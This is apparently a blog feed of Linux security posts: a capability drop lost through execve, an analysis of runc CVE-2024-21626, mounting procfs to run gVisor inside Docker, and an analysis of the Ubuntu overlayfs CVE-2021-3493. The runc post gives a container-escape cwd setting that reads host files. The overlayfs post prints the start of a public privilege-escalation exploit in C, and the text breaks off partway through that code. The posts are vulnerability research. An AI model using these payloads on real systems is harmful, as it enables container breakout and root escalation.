不忘初心 方得始终2024-02-24T02:55:43+00:00http://terenceli.github.ioTerenceliliq3ea@163.comLinux process capability change through execve syscall2024-02-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/02/24/cap-change-execve
<h3> The issue </h3>
<p>I have encountered an interesting issue about capability change through execve syscall. Once we drop current process’s capability, then execve another program, the new program get the dropped capability again. Following poc shows this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package main
import (
"os"
"time"
goruntime "runtime"
"os/exec"
"syscall"
"github.com/syndtr/gocapability/capability"
)
func main() {
cap1, _ := capability.NewPid(os.Getpid())
goruntime.LockOSThread()
defer goruntime.UnlockOSThread()
cap1.Unset(capability.EFFECTIVE, 2)
cap1.Unset(capability.PERMITTED, 2)
cap1.Unset(capability.INHERITABLE, 2)
cap1.Unset(capability.BOUNDING, 2)
cap1.Unset(capability.AMBIENT, 2)
cap1.Apply(capability.CAPS)
time.Sleep(20 * time.Second)
binary, lookErr := exec.LookPath("bash")
if lookErr != nil {
panic(lookErr)
}
args := []string{"bash"}
env := os.Environ()
execErr := syscall.Exec(binary, args, env)
if execErr != nil {
panic(execErr)
}
}
</code></pre></div></div>
<p>During the Sleep, we see the process has following cap:</p>
<p><img src="/assets/img/capexecve/1.png" alt="" /></p>
<p>After execve, we see the same process has following cap:</p>
<p><img src="/assets/img/capexecve/2.png" alt="" /></p>
<p>This means we don’t drop capability in new program.</p>
<h3> The solution </h3>
<p>It first shocks me. But after quick thought I found the reason: we don’t fork. The child process will inherit the parent’s capability, but if no fork the execve will have his own logic for capability in this case, it has full capability.
The quick solution is to use fork+execve, but our scenario here can’t use fork for some reason.
After some time thought, I suddenly remember that the Linux has a process attribute named ‘no_new_privs’. The ‘no_new_privs’ <a href="https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt">document</a> says:</p>
<blockquote>
<p>With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.</p>
</blockquote>
<p>But amost all of the document is about suid, no capability.
Then I try following code, add Prctl(unix.PR_SET_NO_NEW_PRIVS) after drop capability then do execve syscall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package main
import (
"fmt"
"os"
"time"
goruntime "runtime"
"os/exec"
"syscall"
"github.com/syndtr/gocapability/capability"
"golang.org/x/sys/unix"
)
func main() {
cap1, _ := capability.NewPid(os.Getpid())
goruntime.LockOSThread()
defer goruntime.UnlockOSThread()
cap1.Unset(capability.EFFECTIVE, 2)
cap1.Unset(capability.PERMITTED, 2)
cap1.Unset(capability.INHERITABLE, 2)
cap1.Unset(capability.BOUNDING, 2)
cap1.Unset(capability.AMBIENT, 2)
cap1.Apply(capability.CAPS)
if err := unix.Prctl(unix.PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); err != nil {
fmt.Println("set new privs error")
}
time.Sleep(20 * time.Second)
binary, lookErr := exec.LookPath("bash")
if lookErr != nil {
panic(lookErr)
}
args := []string{"bash"}
env := os.Environ()
execErr := syscall.Exec(binary, args, env)
if execErr != nil {
panic(execErr)
}
}
</code></pre></div></div>
<p>After execve, I see the following process capability, as we can see it works.</p>
<p><img src="/assets/img/capexecve/3.png" alt="" /></p>
<h3> The internals </h3>
<p>When execve detects that the current process has been set no_new_privs, it will add ‘LSM_UNSAFE_NO_NEW_PRIVS’ flag to ‘bprm->unsafe’ in ‘check_unsafe_exec’ function in fs/exec.c file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void check_unsafe_exec(struct linux_binprm *bprm)
{
struct task_struct *p = current,
t;
unsigned n_fs;
...
/
* This isn't strictly necessary, but it makes it harder for LSMs to
* mess up.
*/
if (task_no_new_privs(current))
bprm->unsafe |= LSM_UNSAFE_NO_NEW_PRIVS;
...
}
</code></pre></div></div>
<p>Later in ‘cap_bprm_creds_from_file’ function in security/commoncap.c it will check ‘bprm->unsafe & ~LSM_UNSAFE_PTRACE’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int cap_bprm_creds_from_file(struct linux_binprm *bprm, struct file *file)
{
...
/* Don't let someone trace a set[ug]id/setpcap binary with the revised
* credentials unless they have the appropriate permit.
*
* In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
*/
is_setid = __is_setuid(new, old) || __is_setgid(new, old);
if ((is_setid || __cap_gained(permitted, new, old)) &&
((bprm->unsafe & ~LSM_UNSAFE_PTRACE) ||
!ptracer_capable(current, new->user_ns))) {
/* downgrade; they get no more than they had, and maybe less */
if (!ns_capable(new->user_ns, CAP_SETUID) ||
(bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
new->euid = new->uid;
new->egid = new->gid;
}
new->cap_permitted = cap_intersect(new->cap_permitted,
old->cap_permitted);
}
...
}
</code></pre></div></div>
<p>If this is true, it will caculate the new cap_permitted using ‘cap_intersect’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> new->cap_permitted = cap_intersect(new->cap_permitted,
old->cap_permitted);
</code></pre></div></div>
<p>In this way the current process cap which has been dropped affects the new execve process.</p>
Why Golang eat my fd 3 in child process2024-02-03T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/02/03/golang-eat-fd3
<p>Recently I analyzed the runc vulnerability CVE-2024-21626. The root cause of this vulnerability is that a cgroup fd is leaked to ‘runc init’ process. While digging into the root cause, I found something interesting of Golang’s fd inheritance. This post describes the founding in detail.
First we need have a look at CVE-2024-21626.</p>
<h3> CVE-2024-21626 analysis </h3>
<h4> runc double clone process </h4>
<p>While creating the container environment, runc uses double clone method to do the complicated separated things. Following pic shows the process.</p>
<p><img src="/assets/img/golangeatfd3/1.png" alt="" /></p>
<p>runc first start runc[0:PARNET] process, the runc[0:PARENT] will clone a runc[1:CHILD] process, runc[1:CHILD] process will clone runc[2:INIT] process and finally the runc[2:INIT] process will execute the specified process in OCI configuration.</p>
<h4> runc fd leak vulnerability </h4>
<p>runc[2:INIT] will do the final work such as prepare the rootfs and change to rootfs, find the executable before executing the container process. In this process, the fd can be leaked to container process. As the fd is point to a file in the host filesystem if the container process can see this fd, it can break out container environment by leveraging this fd. runc has several this kind of vulnreability in history, the most famous is CVE-2019-5736. The root cause of CVE-2019-5736 is that the container process can see /proc/self/exe which is point to the host runc binary. Following pic(from https://blog.wohin.me/posts/hack-runc-elf-inject/) show the root cause of CVE-2019-5736 and how to exploit it.</p>
<p><img src="/assets/img/golangeatfd3/2.png" alt="" /></p>
<h4> CVE-2024-21626 </h4>
<p>The root cause of this vulnerability is that a fd point /sys/fs/cgroup directory is leaked to runc init process. The leak happens here in file libcontainer/cgroups/file.go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func prepareOpenat2() error {
prepOnce.Do(func() {
fd, err := unix.Openat2(-1, cgroupfsDir, &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH, // no unix.O_CLOEXEC flag
})
...
</code></pre></div></div>
<p>The unix.Openat2 is used to open the cgroupfsDir(/sys/fs/cgroup) without unix.O_CLOEXEC flag set. After runc init execve the container process this fd will not be closed thus leaked to the container process.
When we add a Sleep code in runc init, we can see following:</p>
<p><img src="/assets/img/golangeatfd3/3.png" alt="" /></p>
<p>As we can see the fd 7 point to the /sys/fs/cgroup. We can set the ‘cwd’ in OCI config to ‘/proc/self/fd/7/../../../../’, when the container process runs, our current working directory will point to the host rootfs.
Using following ‘args’ and ‘cwd’ to run a container</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "args": [
"cat", "hostfile"
],
...
"cwd": "/proc/self/fd/7/../../../../",
</code></pre></div></div>
<p>We can see the container process read the file success.</p>
<p><img src="/assets/img/golangeatfd3/4.png" alt="" /></p>
<p>It seems not difficult to understand this vulnerability. But while reading the fix patches, I found something interesting. The first is after apply the backported commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a> I can’t see the fd leak. And also I see this words</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> In practice, on runc 1.1 this does leak to "runc init" but on main the
handle has a low enough file descriptor that it gets clobbered by the
ForkExec of "runc init".
</code></pre></div></div>
<p>I want to know how it gets ‘clobbered’. And in cgroup v2 this issue is doesn’t exist. runc exec doesn’t trigger this issue.
In summary there are several issues that have been attracted my attention.</p>
<ol>
<li>Why the main branch doesn’t affected by this CVE</li>
<li>Why cgroup v2 doesn’t doesn’t affected by this CVE</li>
<li>Why the first patch mitigates this CVE</li>
<li>Why ‘run exec’ doesn’t trigger this CVE</li>
</ol>
<p>I decided to dig into this issue.</p>
<h3> The fd inheritance in Golang cmd Run </h3>
<p>First of all, I need to find out the fd inheritance about the os.Open and syscall.Openat2 as the first one related to commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a> and the second related to the fd leak. I write two simple program, the first is ‘wait’, it is just used to be launched by another program ‘test’. After the start wait, we can see the fd status of these two process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //wait
package main
import "time"
func main() {
time.Sleep(20 * time.Second)
}
</code></pre></div></div>
<h4> os.Open fd </h4>
<p>Using following ‘test’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> os.Open("/home/test")
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.Run()
</code></pre></div></div>
<p><img src="/assets/img/golangeatfd3/5.png" alt="" /></p>
<p>cmd.Run uses ForkExecve to start a new process. As we can see, the child process (runc init) doesn’t inherit the fd opend by os.Open. This is because that os.Open adds the O_CLOEXEC, so every file opened by os.Open will be closed after execve. The source code can be found <a href="https://github.com/golang/go/blob/master/src/os/file_unix.go#L272">here</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func openFileNolog(name string, flag int, perm FileMode) (*File, error) {
...
var r int
var s poll.SysFile
for {
var e error
r, s, e = open(name, flag|syscall.O_CLOEXEC, syscallMode(perm))
...
</code></pre></div></div>
<h4> syscall.Openat2 fd </h4>
<p>Let’s see the behaviour of syscall.Openat2. Use following ‘test’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.Run()
</code></pre></div></div>
<p>As we can see the “/sys/fs/cgroup” fd in the child process.</p>
<p><img src="/assets/img/golangeatfd3/6.png" alt="" /></p>
<p>So the fd opened by ‘unix.Openat2’ will not be closed after ForkExecve.</p>
<h4> The magick </h4>
<p>When I just apply the commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a> the interesting things happen. Though the ‘runc runc’ has a fd point to ‘/sys/fs/cgroup’ the ‘runc init’ has no this fd. The cgroupfd in ‘ tryDefaultCgroupRoot’ function will be closed after apply the 937c commit. So the ‘runc run’ fd 3 is the fd in ‘prepareOpenat2’ function.</p>
<p><img src="/assets/img/golangeatfd3/7.png" alt="" /></p>
<p>But as we can see in our previous test, the fd opend by ‘syscall.Openat2’ will be inherited by child process. We don’t see the fd in child process. What’s wrong?
After I navigating the runc code and do some experiment I found the most different between the ‘runc’ start a new process with my test is that in the runc case before it call cmd.Run it also set cmd.ExtraFiles.
Let’s do the following test.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.SysProcAttr = &unix.SysProcAttr{}
pipeRead, pipeWrite, _ := os.Pipe()
defer pipeRead.Close()
defer pipeWrite.Close()
cmd.ExtraFiles = []*os.File{pipeWrite}
cmd.Run()
</code></pre></div></div>
<p>Following is the fd of parent and child process.</p>
<p><img src="/assets/img/golangeatfd3/8.png" alt="" /></p>
<p>We have reproduced the issue, the fd 3 is eaten by Golang after cmd.Run if we add cmd.ExtraFiles. What if we open two fd by unix.Openat2?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
unix.Openat2(-1, "/home/test", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.SysProcAttr = &unix.SysProcAttr{}
pipeRead, pipeWrite, _ := os.Pipe()
defer pipeRead.Close()
defer pipeWrite.Close()
cmd.ExtraFiles = []*os.File{pipeWrite}
cmd.Run()
</code></pre></div></div>
<p>As we can see only the fd 3 is eaten.</p>
<p><img src="/assets/img/golangeatfd3/9.png" alt="" /></p>
<p>After read the go source and document, I found following words in https://pkg.go.dev/os/exec.</p>
<p><img src="/assets/img/golangeatfd3/10.png" alt="" /></p>
<p>ExtraFiles is used to specify the open files to be inherited by the child process. and entry i becomes file descriptor 3+i as the first three is standard input/output/error. If we add two ExtraFiles we can see our fd 4 is also eaten.</p>
<p><img src="/assets/img/golangeatfd3/11.png" alt="" /></p>
<p>Now it’s clear that the cmd.ExtraFiles will be guaranteed to be seen in child process. And it may overwrites the fds inherited from parent.</p>
<h3> Conclusion </h3>
<h4> About the CVE-2024-21626 </h4>
<p>After the investigation, we can now have the full picture of CVE-2024-21626.
The root cause of this CVE is that a cgroupfd is leaked to ‘runc init’. This cgroupfd is opend in prepareOpenat2 using syscall.Openat2 without O_CLOEXEC flag set. So this fd is leaked to ‘runc init’.
The main branch is not affected because it has commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a>. This commit close another opened cgroupfd in time. So the prepareOpenat2 fd open will hold the fd 3. and it is low enough it will be clobbered by cmd.Run(forkExecve).
The cgroup v2 is not affected is that tryDefaultCgroupRoot open cgroupfd only in cgroup v1, so even it has no commit 937c the prepareOpenat2 fd will be 3.
The ‘run exec’ doesn’t trigger this CVE is because the tryDefaultCgroupRoot will only be called in ‘runc init’ process not in ‘runc exec’ so the prepareOpenat2 fd will be 3.</p>
<h4> Golang fd inheritance after cmd Run </h4>
<p>Three things get from this CVE.</p>
<ol>
<li>os.Open fd will automatically closed as Golang adds O_CLOEXEC implicitly</li>
<li>syscall.Openat2 fd will not be closed automatically and will be inherited by child process even this is unwanted</li>
<li>Golang only guarantees that the cmd.ExtraFiles will be inherited by child process and it may destroy the unwanted inherited fd.</li>
</ol>
<h3> Ref </h3>
<p>The runc internals(written by myself): https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3</p>
mount procfs in unprivileged container2023-12-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2023/12/29/mount-procfs-in-container
<h3> Background </h3>
<p>gVisor is an application kernel that implements a substantial portion of the Linux system surface. gVisor is mostly used in cloud native as it implements an OCI runtime runsc. runsc uses the application kernel which is named Sentry to run the user’s application. By this mean, the application doesn’t share the same kernel with the host like what runc does which largely reduce the attack surface in container ecosystem.</p>
<p>gVisor is quite interesting that it rewrites the Linux syscall interface. The foundation of gVisor is system call interception. gVisor has three means of system call interception, ptrace, kvm and systrap. gVisor uses these interception means to intercept the user’s application syscall and reimplements it in Sentry.</p>
<p>Though gVisor is used mostly in cloud native ecosystem, it is useful in process-level sandbox. I have designed a process-level sandbox based gVisor to sandbox the dangerous third party program.</p>
<p>Recently I encounter a problem that run gVisor in unprivileged container like docker or podman. When I run gVisor in docker it returns an EPERM error code. Following shows the error.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu
root@21adbdee0c6d:/# cd /tmp
root@21adbdee0c6d:/tmp# ./runsc -rootless --debug --debug-log=/tmp/log/ do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
creating container: cannot create sandbox: cannot read client sync file: waiting for sandbox to start: EOF
root@21adbdee0c6d:/tmp# cd log/
root@21adbdee0c6d:/tmp/log# ls
...
W1227 04:54:24.366822 1 specutils.go:124] noNewPrivileges ignored. PR_SET_NO_NEW_PRIVS is assumed to always be set.
W1227 04:54:24.366995 1 util.go:64] FATAL ERROR: error mounting proc: operation not permitted
error mounting proc: operation not permitted
root@21adbdee0c6d:/tmp/log#
</code></pre></div></div>
<p>After navigating the code, I found the error occurs in <a href="https://github.com/google/gvisor/blob/master/runsc/cmd/gofer.go#L394C21-L394C21">mount procfs</a>.
The error is that mount procfs in docker container return EPERM.</p>
<h3> Analysis </h3>
<p>The mount syscall has several point to return EPERM. We need find which point it is that cause our gVisor failed.</p>
<p>I used following method. First patch the gVisor to add sleep code before the mount procfs error. Then we run runsc. The gofer process(which the mount failed occurs) will sleep. We uses trace-cmd to trace the gofer process’ kernel function call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace-cmd record -P <goferpid> function_graph
</code></pre></div></div>
<p>After look at the trace output, I find the suspicious function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> | security_sb_kern_mount();
| mount_too_revealing() {
| down_read() {
| __cond_resched();
| }
| _raw_spin_lock();
| _raw_spin_unlock();
| up_read();
| }
| fc_drop_locked() {
</code></pre></div></div>
<p>From the code we can found the ‘mount_too_revealing’ return true and should be responsible for our EPERM. ‘mount_too_revealing’ calls ‘mnt_already_visible’ to do the decision. As my <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/06/cve-2022-0492">previous blog</a> said:</p>
<p>‘mnt_already_visible’ will iterate the new mount namespace and check whether it has child mountpoint. If it has child mountpoint, it is not fully visible to this mount namespace so the procfs will not be mounted. This reason is as following. The procfs and sysfs contains some global data, so the container should not touch. So mouting procfs and sysfs in new user namespace should be restricted. Anyway, if we allow this, we can mount the whole procfs data in new user namespace. In docker and runc environment, it has ‘maskedPaths’ which means the path should be masked in container.</p>
<p>Also I find there an old discuss in <a href="https://github.com/opencontainers/runc/issues/1658">runc issue</a>. The reason is just as I said. But Alban Crequy gives <a href="https://github.com/opencontainers/runc/issues/1658#issuecomment-375750981">two solutions</a>.</p>
<ol>
<li>
<p>by add ‘-v /proc:/newproc’ in the docker command, thus the runsc can see the full procfs, so there will be no EPERM</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /proc:/newproc ubuntu root@0723fa9d5c92:/# cd /tmp/
root@0723fa9d5c92:/tmp# ls
runsc
root@0723fa9d5c92:/tmp# ./runsc --rootless do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
runsc runsc-do1613356723
root@0723fa9d5c92:/tmp#
</code></pre></div> </div>
</li>
<li>
<p>by first create a dead pidns, then mount this procfs to docker container</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # unshare -p -f mount -t proc proc /mnt/proc
# docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /mnt/proc:/newproc ubuntu
root@eda100eadf1f:/# cd /tmp
root@eda100eadf1f:/tmp# ./runsc --rootless do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
runsc runsc-do1925241706
root@eda100eadf1f:/tmp#
</code></pre></div> </div>
</li>
</ol>
<p>Both two solutions is not very elegant. Luckily runsc here doesn’t need mount a whole procfs, it just need to open /proc/self/fd and read some generic files. Andrei Vagin has prepare a <a href="https://github.com/google/gvisor/commit/063ee51c57f6cd5c64aa0d115396941dce455b8b">patch</a> to address this issue, without any tricks. It binds mount current /proc instead of mounting a new procfs instance.</p>
<h3> Conclude </h3>
<ol>
<li>mount syscall needs CAP_SYS_ADMIN. unprivileged user can get CAP_SYS_ADMIN in new user ns. Some filesystem can be mounted in new user ns by specifying the ‘FS_USERNS_MOUNT’ flag.</li>
<li>procfs and sysfs can be mounted in new user ns. But if there are child mounts in procfs and sysfs the mount syscall will return EPERM.</li>
</ol>
<p>Not all filesystem can be mounted in non-root user namespace. There is a permission check in mount syscall.</p>
<h3> Ref </h3>
<ol>
<li>gVisor issue: https://github.com/google/gvisor/issues/8205</li>
<li>runc issue: https://github.com/opencontainers/runc/issues/1658</li>
</ol>
CVE-2021-3493 Ubuntu overlayfs privilege escalation vulnerability analysis2022-09-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/09/12/CVE-2021-3493-ubuntu-overlayfs-escalation
<p>CVE-2021-3493 is a logic vulnerability in overlayfs filesystem, with a change of Ubuntu, it can be exploited to do privilege escalation. This post introduce the background, the root cause and the fix of this vulnerability.</p>
<h3> Overlayfs </h3>
<p>Overlayfs is a kind of filesystem that combines one upper layer directory tree and several lower layers directory tree to one filesystem. The upper layer directory is mounted read-write and the lower layers is mounted read-only. The filesystem operations of overlayfs always goes to the upper layer and lower layer.
Following pic show the basic concepts of overlayfs(from <a href="https://arkingc.github.io/2017/09/20/2017-09-20-linux-code-overlayfs-layerinfo/">this post</a>).</p>
<p><img src="/assets/img/cve_2021_3493/1.png" alt="" /></p>
<p>Following pic show a basic usage of overlayfs.</p>
<p><img src="/assets/img/cve_2021_3493/2.png" alt="" /></p>
<p>As we can see, when creating a file that doesn’t exist in upper or layer directry, the file will be created in the upper directory even after the overlayfs is umounted. Not only the create operations, most of(if not all) the file operations will be redirected to the upper or lower directory thus leading the corresponding filesystem operations to be called. Les’t see the creation process.</p>
<p><img src="/assets/img/cve_2021_3493/3.png" alt="" /></p>
<p>The ‘ovl_new_inode’ will create the inode of overlayfs layer, and the ‘vfs_create’ will create the file in the upper layer directory, this is the ‘real’ file. Let’s see another function call chain with the vulnerability setxattr.</p>
<p><img src="/assets/img/cve_2021_3493/4.png" alt="" /></p>
<p>Notice we can see again the double ‘vfs_setxattr’ calls, the first is for overlayfs layer and the second is for the upper directory file, the real file. Notice before the first ‘vfs_setxattr’ call, the ‘cap_convert_nscap’ has been called, but the second not. This is the key point of this vulnerability.</p>
<p>This is the backgroud of overlayfs for understanding this vulnerability. Overlayfs is used in container widely.</p>
<h3> Capabilities </h3>
<p>Linux capabilities divides the privileges traditionally associated with superuser into distinct units. In order to assign the capabilities to process, the binary file can be assigned with capabilities. The example is ‘ping’ binary. ‘ping’ process needs to construct raw sockets which needs cap_net_raw capablility. In order to let the unprivileged user to use ‘ping’ binary, the ‘ping’ binary needs to be assigned ‘cap_net_admin’.</p>
<p>The binary capabilities is assgned by ‘extend attributes’. Following pic shows the ‘ping’ binary case.</p>
<p><img src="/assets/img/cve_2021_3493/5.png" alt="" /></p>
<p>If the binary has been set capabilities, the ‘security.capability’ has a related value. If not, there is no this file extend attributes, such as ‘ls’ binary.</p>
<p>When the binary which has ‘capabilities’ been executed. The kernel will assign the capabilities to the process. This is alike ‘suid’ binary but the ‘suid’ bit is set in the file attributes in inode(if I remember correctly). Following pic shows the ‘su’ binary has no ‘security.capability’ extend attribute.</p>
<p><img src="/assets/img/cve_2021_3493/6.png" alt="" /></p>
<p>struct cred stores the capabilities of process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cred {
...
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
...
} __randomize_layout;
</code></pre></div></div>
<p>Here the several cap is not the topic of this post. ‘cap_effective’ is used to do the capabilitiy permission check. When the binary has file capabilities setting, the ‘get_vfs_caps_from_disk’ will be called to get the binary file in the ‘execve’ syscall, then ‘bprm_caps_from_vfs_caps’ will be called to set the ‘cred’s cap_permitted.</p>
<h3> Mount filesystem in new user namespace </h3>
<p>Not all filesystem can be mounted in non-root user namespace. There is a permission check in mount syscall.</p>
<p><img src="/assets/img/cve_2021_3493/7.png" alt="" /></p>
<p>If the filesystem’s fs_flags has no FS_USERNS_MOUNT set, this means the init user ns will be used to check the CAP_SYS_ADMIN capabilities. Otherwise, the ‘fc->user_ns’ will be used. For new mount, the ‘fc->user_ns’ is set to the current process’s user ns.</p>
<p><img src="/assets/img/cve_2021_3493/8.png" alt="" /></p>
<p>There are just a little filesystem that sets ‘FS_USERNS_MOUNT’, it’s procfs, sysfs, ramfs, tmpfs and so on, only them can be mounted in non-root user namespace.</p>
<p>Notice, when mount syscall is handled, there is also a check whether the mount namespace’s user ns has the CAP_SYS_ADMIN.</p>
<p><img src="/assets/img/cve_2021_3493/9.png" alt="" /></p>
<h3> The vulnerability </h3>
<p>This vulnerabilitiy is Ubuntu-specific. The overlayfs can’t be mounted in non-root usernamespace in mainline upstream Linux kernel, but Ubuntu changed this behaviour as it added ‘FS_USERNS_MOUNT’ to the overlayfs filesystem.
The upstream ‘ovl_fs_type’ definition.</p>
<p><img src="/assets/img/cve_2021_3493/10.png" alt="" /></p>
<p>The Ubuntu ‘ovl_fs_type’ from <a href="https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/focal/tree/fs/overlayfs/super.c?h=Ubuntu-5.4.0-42.46">here</a>.</p>
<p><img src="/assets/img/cve_2021_3493/11.png" alt="" /></p>
<p>But there is also an upstream bug that with Ubuntu’s change make the bug exploitable, to be a vulnerability.
Let’s recap the setxattr call chain.</p>
<p><img src="/assets/img/cve_2021_3493/12.png" alt="" /></p>
<p>While the userspace triggers a setxattr syscall for the overlayfs file, it calls ‘cap_convert_nscap’. When the size indicates this is a cap v2 format, ‘cap_convert_nscap’ calls ‘ns_capable’ to check the permission.</p>
<p><img src="/assets/img/cve_2021_3493/13.png" alt="" /></p>
<p>Here ‘cap_convert_nscap’ checks whether the ‘inode->i_sb->s_user_ns’ user ns has the ‘CAP_SETFCAP’ capability.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ns_capable(inode->i_sb->s_user_ns, CAP_SETFCAP))
</code></pre></div></div>
<p>The ‘inode->i_sb->s_user_ns’ is assignge by the following call chain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ovl_mount
-->mount_nodev
-->sget
-->alloc_super
struct super_block *sget(struct file_system_type *type,
int (*test)(struct super_block *,void *),
int (*set)(struct super_block *,void *),
int flags,
void *data)
{
struct user_namespace *user_ns = current_user_ns();
...
if (!s) {
spin_unlock(&sb_lock);
s = alloc_super(type, (flags & ~SB_SUBMOUNT), user_ns);
if (!s)
return ERR_PTR(-ENOMEM);
goto retry;
}
...
}
static struct super_block *alloc_super(struct file_system_type *type, int flags,
struct user_namespace *user_ns)
{
struct super_block *s = kzalloc(sizeof(struct super_block), GFP_USER);
static const struct super_operations default_op;
int i;
if (!s)
return NULL;
INIT_LIST_HEAD(&s->s_mounts);
s->s_user_ns = get_user_ns(user_ns);
}
</code></pre></div></div>
<p>As we can see the ‘s->s_user_ns’ is initialized from the process of ‘mount’ which in the exploit is a new user ns which has has full capabilities. Here this ‘inode’ is the inode which overlayfs create, its superblock’s s_user_ns is a new user ns. And a new user ns has all of the CAP_SETFCAP. So here ‘ns_capable’ will return 0 which means the process has the ‘CAP_SETFCAP’ in this new user ns.</p>
<p>Return to the call chain of setxattr syscall, after ‘cap_convert_nscap’ check permission passed, the ‘vfs_setxattr’ is called first time. Notice, the first time of calling ‘vfs_setxattr’ is using the overlayfs layer’s dentry. Then goes to the upper dir’s ‘vfs_setxattr’, as the upperdir is a directory in the host filesystem (ext4), so the ext4 filesystem’s setxattr(ext4_xattr_set) will be called and finally the extend attributes will be written to the upperdir file.</p>
<h3> Exploit </h3>
<p>Following exploit is copied from the <a href="https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/">ssd-disclosure</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>
//#include <attr/xattr.h>
//#include <sys/xattr.h>
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
#define DIR_BASE "./ovlcap"
#define DIR_WORK DIR_BASE "/work"
#define DIR_LOWER DIR_BASE "/lower"
#define DIR_UPPER DIR_BASE "/upper"
#define DIR_MERGE DIR_BASE "/merge"
#define BIN_MERGE DIR_MERGE "/magic"
#define BIN_UPPER DIR_UPPER "/magic"
static void xmkdir(const char *path, mode_t mode)
{
if (mkdir(path, mode) == -1 && errno != EEXIST)
err(1, "mkdir %s", path);
}
static void xwritefile(const char *path, const char *data)
{
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "open %s", path);
ssize_t len = (ssize_t) strlen(data);
if (write(fd, data, len) != len)
err(1, "write %s", path);
close(fd);
}
static void xcopyfile(const char *src, const char *dst, mode_t mode)
{
int fi, fo;
if ((fi = open(src, O_RDONLY)) == -1)
err(1, "open %s", src);
if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
err(1, "open %s", dst);
char buf[4096];
ssize_t rd, wr;
for (;;) {
rd = read(fi, buf, sizeof(buf));
if (rd == 0) {
break;
